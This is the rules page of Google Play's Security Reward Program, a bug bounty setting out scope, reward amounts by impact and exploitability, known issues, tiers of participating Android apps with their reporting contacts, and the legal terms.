Google Play Security Reward Program Rules

Google Play Security Reward Program (GPSRP) is a vulnerability reward program offered by Google Play in collaboration with the developers of certain popular Android apps. It recognizes the contributions of security researchers who invest their time and effort in helping make apps on Google Play more secure.

The goal of the program is to identify and mitigate vulnerabilities in apps on Google Play, and keep Android users, developers and the Google Play ecosystem safe.

If you're an app developer that would like to learn more about working directly with external security researchers, please apply to join GPSRP.

Exposure Notification API and Associated Apps

GPSRP is temporarily introducing the Exposure Notification API and any apps (both first and third party) on Google Play using the Exposure Notification API into scope, as well as any governmental apps on Google Play related to Contact Tracing. If you identify a vulnerability in an app of this nature, please submit the vulnerability details directly to GPSRP. Note that the non-qualifying issues below, at panel discretion, may still qualify for apps in this temporary scope.

Hacker “Cheat Sheet”

GPSRP focuses on identifying vulnerabilities in popular Android apps on Google Play (i.e. with 100 million or more installs, and any apps listed in scope). Please see the rules and reward criteria below for more detail.

Disclosure Process

Duplicates

A “duplicate” refers to when a vulnerability report is submitted that is very similar or exactly the same as a previously submitted report.

SDK and library vulnerabilities

Program Rules

Reward Criteria

Rewards are based on impact and exploitability. The following table outlines the usual rewards chosen for the most common classes of bugs.

Category 1) Remote / no user interaction 2) User must follow a link, vulnerable app must be already installed 3) User must install malicious app or victim app is configured in a non-default way 4) Attacker must be on the same network (e.g. MiTM)
Arbitrary code execution $20,000 $10,000 $4,000 $1,000
Theft of sensitive data $5,000 $3,000 $1,000 $500

The following sections outline the impacts above in more detail.

Arbitrary Code Execution (ACE)

In order to qualify, ACE should allow an attacker to run native ARM code of their choosing on a user’s device without user knowledge or permission, in the same process as the affected app (there is no requirement that the OS sandbox needs to be bypassed).

Examples may include:

Executing arbitrary JavaScript does not qualify. Tricking a user into installing an app and executing code within that app itself does not qualify.

Theft of sensitive data

This impact category includes vulnerabilities that lead to unauthorized access to sensitive data from an app on an Android device.

For the scope of this program, sensitive data is classified as:

Location information alone does not qualify (unless combined with the ability to uniquely identify an individual by name).

Access to non-sensitive internal files of another app does not qualify.

Examples of vulnerabilities that result in this impact include, but are not limited to:

For more information on vulnerability classes, please see this PDF.

Non-qualifying issues

Known Issues

Issues already known to Google (and in the process of being mitigated/fixed) that can be used to uncover similar vulnerabilities across multiple apps in Google Play Store will be published to the known issues list. Such vulnerabilities are not deemed severe enough to warrant the default reward from Google Play (while still being relevant for the developer to fix), but may still qualify for a smaller reward (listed below).

Issue Category Reward
Theft of sensitive data via malicious URL input and symlinks, javascript: URLs, file: URLs, content: URLs, or custom deeplinks. E.g. passing malicious URL input to an app resulting in the app processing a link of this nature or other URL that results in access to sensitive data. $500
Malicious URL input resulting in leaking session information. E.g. passing malicious URL input to an app that results in the user navigating to an attacker-controlled website, where the app automatically appends cookies or parameter values containing session information to the requests. (effective December 15, 2019) $500

Scope

Only applications developed by Google, by participating developers (in the list below), or with 100 million or more installs are in scope. Only vulnerabilities that work on Android 6.0 devices (with the most up to date patches) and higher will qualify.

For Google-developed Android apps : Please report vulnerabilities through the Google Vulnerability Reward Program or, for Chrome specifically, to the Chrome Reward Program . You can submit a reward claim here after the vulnerability is fixed.

Tier 1

Tier 1 programs have average first response times of less than 1 day, and resolution times of less than or equal to 1 month.

Organization/Developer Package Name(s) Submit vulnerabilities to:
Grammarly com.grammarly.android.keyboard https://hackerone.com/grammarly
Instacart - Client com.instacart.client https://hackerone.com/instacart
Instacart - Shopper com.instacart.shopper https://hackerone.com/instacart
JNJ Mobile com.jnj.mocospace.android https://hackerone.com/jnj_mobile
Line jp.naver.line.android https://hackerone.com/line
MagicLab com.bumble.app https://hackerone.com/bumble
Mail.Ru ru.mail.cloud, ru.mail.auth.totp, ru.mail.mailapp, com.my.mail, ru.mail.calendar https://hackerone.com/mailru
MobiSystems com.mobisystems.msdict.embedded..., com.mobisystems.fileman, com.mobisystems.office https://hackerone.com/mobisystems_ltd
PicsArt com.picsart.studio https://hackerone.com/picsart
Showmax com.showmax.app https://tech.showmax.com/security/
Spotify com.spotify.music, com.spotify.tv.android, com.spotify.s4a https://hackerone.com/spotify
Shopify com.shopify.pos, com.shopify.mobile, com.shopify.pos.customerview https://hackerone.com/shopify
Zomato com.application.zomato, com.application.zomato.ordering https://hackerone.com/zomato

Tier 2

Tier 2 programs have average first response times of less than or equal to 1 day, and/or triage times of less than or equal to 5 days, and/or resolution times of less than or equal to 3 months.

Organization/Developer Package Name(s) Submit vulnerabilities to:
Airbnb com.airbnb.android https://hackerone.com/airbnb
Dropbox com.dropbox.android, com.dropbox.paper https://hackerone.com/dropbox
Fitbit com.fitbit.FitbitMobile https://www.fitbit.com/bugbounty
Grab com.grab.food.dax, com.grabtaxi.passenger, com.grabtaxi.driver2 https://hackerone.com/grab
Livestream com.livestream.livestream https://hackerone.com/livestream
Lyft me.lyft.android, com.lyft.android.driver https://www.lyft.com/security
MagicLab com.badoo.mobile https://hackerone.com/badoo
PayPal Inc. com.paypal.android.p2pmobile, com.paypal.here, com.paypal.merchant.client, com.xoom.android.app, com.venmo https://hackerone.com/paypal
Priceline com.priceline.android.negotiator https://hackerone.com/priceline
Pinterest com.pinterest https://bugcrowd.com/pinterest
Snapchat com.snapchat.android https://hackerone.com/snapchat
Sweatcoin in.sweatco.app https://hackerone.com/sweatco_ltd
Tesla com.teslamotors.tesla https://bugcrowd.com/tesla

Tier 3

Tier 3 programs either do not meet the criteria for tier 2 or above, or do not publicly display metrics around time to first response, time to triage, or time to resolution.

Organization/Developer Package Name(s) Submit vulnerabilities to:
8bit Solutions LLC com.x8bit.bitwarden security@bitwarden.com
Alibaba com.alibaba.aliexpresshd https://security.alibaba.com/en/
Ayopop com.ayopop devops@ayopop.com
Coinbase com.coinbase.android, org.toshi, com.coinbase.pro https://hackerone.com/coinbase
delight.im im.delight.letters https://hackerone.com/delight_im
Facebook com.facebook.katana, com.facebook.orca, com.instagram.android https://www.facebook.com/whitehat/report/
IRCCloud com.irccloud.android https://hackerone.com/irccloud
Kingsoft Office cn.wps.moffice_eng wps_security@kingsoft.com
Language Drops com.languagedrops.drops.international, com.languagedrops.drops.scrips.learn.write.alphabet.letters.characters.language.japanese.korean.chinese security@languagedrops.com
Ok.Ru ru.ok.android, ru.ok.messages, ru.ok.live https://hackerone.com/ok
Opera com.opera.browser, com.opera.mini.native, com.opera.touch, com.opera.app.news, com.opera.app.newslite https://security.opera.com/report-security-issue/
Quvideo Inc com.quvideo.xiaoying, com.quvideo.slideplus googlesecurity@quvideo.com
Smule com.smule.singandroid.* android-security@smule.com
Telegram Messenger LLP org.telegram.messenger security@telegram.org
TikTok com.ss.android.ugc.trill, com.zhiliaoapp.musically https://support.tiktok.com/en/privacy-safety/reportsecurityvulnerabilities-default
Tinder com.tinder https://www.gotinder.com/security
VHX tv.vhx.* https://hackerone.com/vhx
VK.com (V Kontakte LLC) com.vkontakte.android, com.vk.admin, com.vk.quiz https://hackerone.com/vkcom
VLC org.videolan.vlc https://www.videolan.org/security/
Yandex LLC ru.yandex.disk, ru.yandex.taxi, ru.yandex.metro, ru.yandex.music, ru.yandex.mail, ru.yandex.weatherplugin, ru.yandex.searchplugin, ru.yandex.yandexmaps, ru.yandex.market, com.yandex.browser, ru.yandex.yandexnavi https://yandex.com/bugbounty/report/
YY Inc com.yy.hiyo hago@yy.com

We are unable to issue rewards to individuals who are on US sanctions lists, or who are in countries subject to US sanctions. You are responsible for any tax implications depending on your country of residency and citizenship. There may be additional restrictions on your ability to enter depending upon your local law. This is not a competition, but rather an experimental and discretionary reward program. You should understand that we can cancel the program at any time and the decision as to whether or not to pay a reward has to be entirely at our discretion. Of course, your testing must not violate any law, or disrupt or compromise any data that is not your own. To avoid potential conflicts of interest, we will not grant rewards to people employed by Google or Google Partner companies who develop code for devices covered by this program.

For Finders who participate in certain programs of particular customers, to the extent described in the Program Policies, Google may share contact information about those hackers Finders (name, company name (if applicable) and email address) with app developers to verify the hacker was the original reporter of an issue, and to allow those app developers to contact those Finders to allow them to interact directly. For any reward claim on a fixed vulnerability, Google will reach out to the affected app developer to confirm your claim and determine if the report is eligible for a reward based on the current vulnerability criteria. If the app developer has a private program, please ask the app developer for permission before submitting a reward claim here.

Thank you for helping improve the security of the Google Play ecosystem!